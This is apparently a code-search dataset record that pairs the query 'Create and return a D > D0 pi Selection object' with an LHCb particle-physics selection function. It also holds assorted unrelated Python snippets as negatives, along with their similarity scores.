In this case, add the spwID\n if s == \"\":\n spwid.append(ch)\n chanlist.append('')\n else:\n spwid.append(s)\n chanlist.append(ch)\n \n # Create a dictionary\n seldict = {}\n for ns in xrange(len(spwid)):\n sel = {}\n sel['spw'] = spwid[ns]\n sel['channels'] = chanlist[ns]\n seldict[ns] = sel\n\n\n return seldict", "def __init__(self, time=0, uni=None, dmx=None):\n self.time = time\n self.dmx = {}\n if uni and dmx:\n self.dmx[uni] = dmx", "def add_hic_interval_subparser(subparsers):\n parser = subparsers.add_parser(\"hic-interval\",\n help=\"HiFive Binning Function: Create a tabular interaction file containing data from a HiFive HiC project. Data are a genomic-interval format (chr1 start1 stop1 chr2 start2 stop2).\")\n parser.add_argument(\"-c\", \"--chromosome\", dest=\"chrom\", default=None, required=True, type=str,\n help=\"The chromosome from which to pull interaction data from.\")\n parser.add_argument(\"--chromosome2\", dest=\"chrom2\", default=None, required=False, type=str,\n help=\"The second chromosome from which to pull interaction data from if pulling trans data.\")\n parser.add_argument(\"-s\", \"--start\", dest=\"start\", default=None, required=False, type=int,\n help=\"The start coordinate of the pulled region to return. (None indicates the first valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"-e\", \"--stop\", dest=\"stop\", default=None, required=False, type=int,\n help=\"The stop coordinate of the pulled region to return. (None indicates the last valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"--start2\", dest=\"start2\", default=None, required=False, type=int,\n help=\"The start coordinate of the second chromosome pulled region to return. (None indicates the first valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"--stop2\", dest=\"stop2\", default=None, required=False, type=int,\n help=\"The stop coordinate of the second chromosome pulled region to return. (None indicates the last valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"-b\", \"--binsize\", dest=\"binsize\", default=10000, type=int,\n help=\"The size of bins, in base pairs, to group data into. [default: %(default)s]\")\n parser.add_argument(\"-m\", \"--max-distance\", dest=\"maxdist\", default=None, type=int,\n help=\"The maximum interaction distance to return (None indicates no maximum). [default: %(default)s]\")\n parser.add_argument(\"-d\", \"--data-type\", dest=\"datatype\", default=\"fend\",\n help=\"Which corrections (if any) to apply to counts. [default: %(default)s]\",\n choices=[\"raw\", \"fend\", \"distance\", \"enrichment\", \"expected\"])\n parser.add_argument(\"-M\", \"--matrix\", dest=\"matrix\", default=False, action=\"store_true\",\n help=\"Store output as a tab-separated matrix of values.\")\n parser.add_argument(\"-y\", \"--dynamically-bin\", dest=\"dynamic\", default=False, action=\"store_true\",\n help=\"Dynamically bin heatmap.\")\n parser.add_argument(\"-x\", \"--expansion-binsize\", dest=\"expbinsize\", default=10000, type=int,\n help=\"The size of bins, in base pairs, to group data into for expanding under-populated bins. [default: %(default)s]\")\n parser.add_argument(\"-f\", \"--minobservations\", dest=\"minobs\", default=20, type=int,\n help=\"The minimum number of observed reads in a bin for it to be considered valid. 
[default: %(default)s]\")\n parser.add_argument(\"-a\", \"--search-distance\", dest=\"search\", default=0, type=int,\n help=\"The furthest distance from the bin minpoint to expand bounds. If set to zero, there is no limit on expansion distance. [default: %(default)s]\")\n parser.add_argument(\"-v\", \"--remove-failed\", dest=\"remove\", default=False, action=\"store_true\",\n help=\"If a non-zero 'search-distance' is given, it is possible for a bin not to meet the 'minobservations' criteria before stopping looking. If this occurs and 'remove-failed' is set, the observed and expected values for that bin are zero.\")\n parser.add_argument(\"-i\", \"--image-file\", dest=\"image\", default=None, type=str,\n help=\"Save the data as an image to this file.\")\n parser.add_argument(\"-p\", \"--pdf\", dest=\"pdf\", default=False, action=\"store_true\",\n help=\"Format the image in PDF format. [default: %(default)s]\")\n parser.add_argument(\"-r\", \"--rotate\", dest=\"rotate\", default=False, action=\"store_true\",\n help=\"Rotate the plot 45 degrees (cis binned only). [default: %(default)s]\")\n parser.add_argument(\"-t\", \"--ticks\", dest=\"ticks\", default=False, action=\"store_true\",\n help=\"Add tick marks and labels to the plot (pdf format and binned only). [default: %(default)s]\")\n parser.add_argument(\"-l\", \"--legend\", dest=\"legend\", default=False, action=\"store_true\",\n help=\"Add color scale to the plot (pdf format only). [default: %(default)s]\")\n parser.add_argument(\"-k\", \"--keyword\", dest=\"keywords\", default=[], type=str, action='append',\n help=\"Additional keyword arguments to pass to plotting function.\")\n add_silent_argument(parser)\n parser.add_argument(dest=\"project\", type=str,\n help=\"The name of a HiFive HiC project file to pull data from.\")\n parser.add_argument(dest=\"output\", type=str,\n help=\"The name of the file to write HiC interval to.\")\n return", "def create_ham(self):\n from tcc.interaction import HAM_SPINLESS_RI_CORE\n return HAM_SPINLESS_RI_CORE(self)", "def create_ham(self):\n from tcc.interaction import HAM_SPINLESS_RI_CORE\n return HAM_SPINLESS_RI_CORE(self)", "def generate_access_time_plot_from_range(id_range, val):\n segments = []\n points = []\n\n for i in id_range:\n if isinstance(i, list):\n endpoints = [(i[0], val), (i[1], val)]\n segments.append(endpoints)\n else:\n points.append((i, val))\n return segments, points", "def selective(G, H):\n left_1 = {selective(G_L, H) for G_L in G._left}\n left_2 = {selective(G, H_L) for H_L in H._left}\n left_3 = {selective(G_L, H_L) for G_L in G._left for H_L in H._left}\n right_1 = {selective(G_R, H) for G_R in G._right}\n right_2 = {selective(G, H_R) for H_R in H._right}\n right_3 = {selective(G_R, H_R) for G_R in G._right for H_R in H._right}\n return Game(left_1 | left_2 | left_3, right_1 | right_2 | right_3)", "def select(self, gas=range(1, 12), loc=range(1, 7),\n voltage=range(1, 6), speed=range(1, 4), trial=range(1, 21),\n from_HDFcache=False):\n # cast int entries to list\n if isinstance(gas, int):\n gas = [gas]\n if isinstance(loc, int):\n loc = [loc]\n if isinstance(voltage, int):\n voltage = [voltage]\n if isinstance(speed, int):\n speed = [speed]\n if isinstance(trial, int):\n trial = [trial]\n\n # validate input\n assert min(gas) > 0 and max(gas) in self.GasNames.keys(), \\\n 'Wrong gas name: {}'.format(gas)\n assert min(loc) > 0 and max(loc) in self.Locs.keys(), \\\n 'Wrong board location: {}'.format(loc)\n assert min(voltage) > 0 and max(voltage) in self.SensorVoltages.keys(), 
\\\n 'Wrong sensor voltage: {}'.format(voltage)\n assert min(speed) > 0 and max(speed) in self.FanSpeeds.keys(), \\\n 'Wrong fan speed: {}'.format(speed)\n assert min(trial) > 0 and max(trial) in range(1, 21), \\\n 'Trial number out of range, must be [1,20], is [{},{}]'.format(\n min(trial), max(trial))\n\n cols = self._get_data(gas, loc, voltage, speed, trial)\n return cols", "def __init__(self):\n \n # Call the super contructor\n super(Select, self).__init__(0, 0, 200, 50)\n\n # Assign personalisation attributes\n self.placeholder = \"Choose a value\"\n self.font_name: str = None\n self.font_size: int = 12\n\n self.bg_color: tuple = (0, 0, 0, 0)\n self.bg_hover: tuple = (255, 255, 255, 30)\n self.bg_press: tuple = None\n\n self.label_color: tuple = (255, 255, 255, 255)\n self.label_hover: tuple = None\n self.label_press: tuple = None\n\n self.border_color: tuple = (255, 255, 255, 255)\n self.border_hover: tuple = None\n self.border_press: tuple = None\n self.border_width: int = 4\n\n self.option_height: int = 45\n self.option_margin: int = 5\n self.option_font_name = None\n self.option_font_size = 12\n\n self.option_bg_color: tuple = (0, 0, 0, 0)\n self.option_bg_hover: tuple = (255, 255, 255, 30)\n self.option_bg_press: tuple = None\n self.option_bg_select: tuple = (255, 255, 255, 60)\n\n self.option_label_color: tuple = (255, 255, 255, 255)\n self.option_label_hover: tuple = None\n self.option_label_press: tuple = None\n self.option_label_select: tuple = None\n\n # Assign internal attributes\n self._is_hovered: bool = False\n self._is_pressed: bool = False\n self._is_opened: bool = False\n self._is_inverted: bool = False\n self._options: list = list()\n self._current_select: int = -1\n self._current_hover: int = -1\n\n self._bg = pyglet.shapes.Rectangle\n self._label = pyglet.text.Label\n self._border = Border\n\n self._option_border: Border = None\n self._options_bg: list = list()\n self._options_label: list = list()", "def __init__(self, hgtStartData):\r\n self.data = []\r\n for row in hgtStartData:\r\n toAdd = []\r\n for height in row:\r\n toAdd.append([height, 0])\r\n self.data.append(toAdd)\r\n self.maxX = len(hgtStartData[0]) - 1\r\n self.maxY = len(hgtStartData) - 1\r\n\r\n self.minFloodHeight = 0", "def create_interval_hsb(confidence, n_samples, data_point):\n if n_samples == 0:\n return Interval(0, 1)\n delta = margin_hsb(confidence, n_samples, data_point)\n return Interval(float(max(data_point - delta, 0)), float(min(data_point + delta, 1)))", "def element(selection, sel_type='id'):\n selector = get_selector_method(sel_type)\n return selector(selection)" ]
[ "0.5978266", "0.5615562", "0.53860027", "0.53363514", "0.52604216", "0.5230591", "0.5123659", "0.5109732", "0.5086925", "0.50513536", "0.50479877", "0.5033334", "0.49208", "0.49170148", "0.4872133", "0.4828051", "0.48176673", "0.47932035", "0.4729161", "0.4611828", "0.4548788", "0.45258135", "0.45256746", "0.4518496", "0.45113194", "0.45038095", "0.44976357", "0.4467496", "0.4460264", "0.4458065", "0.445146", "0.44489405", "0.44391263", "0.4399108", "0.43989527", "0.43842357", "0.42949075", "0.42814448", "0.4278862", "0.4273409", "0.42652312", "0.42446917", "0.4239347", "0.42383683", "0.42346287", "0.42314786", "0.42274785", "0.42203844", "0.420049", "0.41954997", "0.41747656", "0.4171289", "0.41667187", "0.41656277", "0.41603115", "0.41472495", "0.41453823", "0.41398874", "0.4138515", "0.41288197", "0.41205293", "0.41195765", "0.41177705", "0.41177705", "0.41170934", "0.41142002", "0.41080582", "0.41022882", "0.40951672", "0.40948918", "0.408553", "0.40842402", "0.4082453", "0.40815133", "0.4077606", "0.40774184", "0.40744117", "0.40719038", "0.40692466", "0.40666434", "0.40657264", "0.40646943", "0.4057667", "0.40538895", "0.4043869", "0.40420336", "0.40403202", "0.4028882", "0.4015297", "0.40142134", "0.40113807", "0.40112755", "0.40112755", "0.40041262", "0.40039748", "0.4002402", "0.40021467", "0.39998695", "0.39994878", "0.39925647" ]
0.40723988
77
Create and return a D > D0 pi Selection object.
def makeDstar2D0Pi( name , config , DecayDescriptor , inputSel ) : daugCuts = "(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)" % locals()['config'] combCuts = "((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)" % locals()['config'] dstarCuts = "(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)" \ "& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)" % locals()['config'] _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "pi+" : daugCuts } , CombinationCut = combCuts , MotherCut = dstarCuts ) return Selection( name+'Sel', Algorithm = _Dstar, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self,initial_v,v_select=0,max_dev_semitones=1):\n self.v=initial_v\n self.v_select=v_select\n self.max_dev_semitones=max_dev_semitones", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def 
makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Bernoulli'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n 
default=default,\n required=required,\n group=group\n )\n self.values = values", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def __init__(self, p) -> None:\n self._p = p\n self._delegate = TwoQubitAsymmetricDepolarizingChannel(p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15)", "def _an_element_(self):\n from sage.rings.integer_ring import ZZ\n return self(self.realization_of().PD().get_point(ZZ.zero()))", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n 
other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def __init__(self, disk_radius=None, even_sampling=False, no_data_value=None, ignore_labels=None):\n self.disk_radius = disk_radius\n self.ignore_labels = [] if ignore_labels is None else ignore_labels\n self.even_sampling = even_sampling\n self.no_data_value = no_data_value", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def initP0(self, size, radius):\n return h.circle(size, radius)[:, :, 0]", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def select(self):\n best_num_components = self.n_constant\n return self.base_model(best_num_components)", "def __init__(self, *args, **kwargs):\n _gdi_.PseudoDC_swiginit(self,_gdi_.new_PseudoDC(*args, **kwargs))", "def __init__(self,min_instances=30, 
drift_level=3.0):\n\n from math import sqrt\n self.min_instances = min_instances\n self.drift_level = float(drift_level)\n self.i = None\n self.pi = None\n self.si = None\n self.pi_min = None\n self.si_min = None\n self.sqrt=sqrt\n self.reset()", "def __init__(self):\n super().__init__()\n self.mu = 0.0\n self.type = 'Poisson'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _create_example_door():\n return Door({\"warning\": False, \"closed\": True, \"locked\": False})", "def construct_random_initial(self):\n x = np.random.random((self._crv_size, self._bound))\n return x", "def __make_slide(self):\n # Create base rectangle for slide\n length = self.parameters['slide_base_length'] + self.parameters['bearing_slide_travel']\n width = self.parameters['slide_width']\n height = self.parameters['slide_height']\n slide = fso.Box(x=length,y=width,z=height)\n # Create the mounting holes\n radius = 0.5*self.parameters['slide_screw_size']\n base_hole = fso.Cylinder(r=radius, l=2*height)\n hole_list = []\n for i in (-1,1):\n for j in (-1,1):\n xpos = i*(0.5*length - self.parameters['slide_screw_inset'])\n ypos = j*(0.5*self.parameters['slide_screw_dW'])\n hole = base_hole.copy()\n hole.translate([xpos,ypos,0])\n hole_list.append(hole)\n # Remove hole material\n slide -= hole_list\n slide.set_color(self.slide_color,recursive=True)\n self.slide = slide", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. 
to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def selection(self):\n if not self._selection:\n return None\n \n year, month = self._date.year, self._date.month\n return self.datetime(year, month, int(self._selection[0]))", "def __init__(self, r1=4.5*0.0254, r2=4.5*0.0254,\n d1=25.0*0.0254, d2=25.0*0.0254,\n Ixx=185000.0*0.45359237*0.0254**2,\n Iyy=185000.0*0.45359237*0.0254**2,\n Izz=3500.0*0.45359237*0.0254**2,):\n self.r1 = r1 # m\n self.r2 = r2 # m\n self.d1 = d1 # m\n self.d2 = d2 # m\n self.Ixx = Ixx # kg-m^2\n self.Iyy = Iyy # kg-m^2\n self.Izz = Izz # kg-m^2", "def _generate_solution(self):\n \n operation_list = []\n available = {job.get_job_id(): [operation for operation in job.get_operations() if operation.get_sequence() == 0] for job in self.jssp_instance_data.jobs} # dictionary of first unprocessed operations of each job\n \n while 0 < len(available):\n rand_job_id = random.choice(list(available.keys()))\n rand_operation = random.choice(available[rand_job_id])\n rand_machine = np.random.choice(rand_operation.get_required_machines())\n\n available[rand_job_id].remove(rand_operation)\n \n if len(available[rand_job_id]) == 0:\n # if selected operation is last operation of the 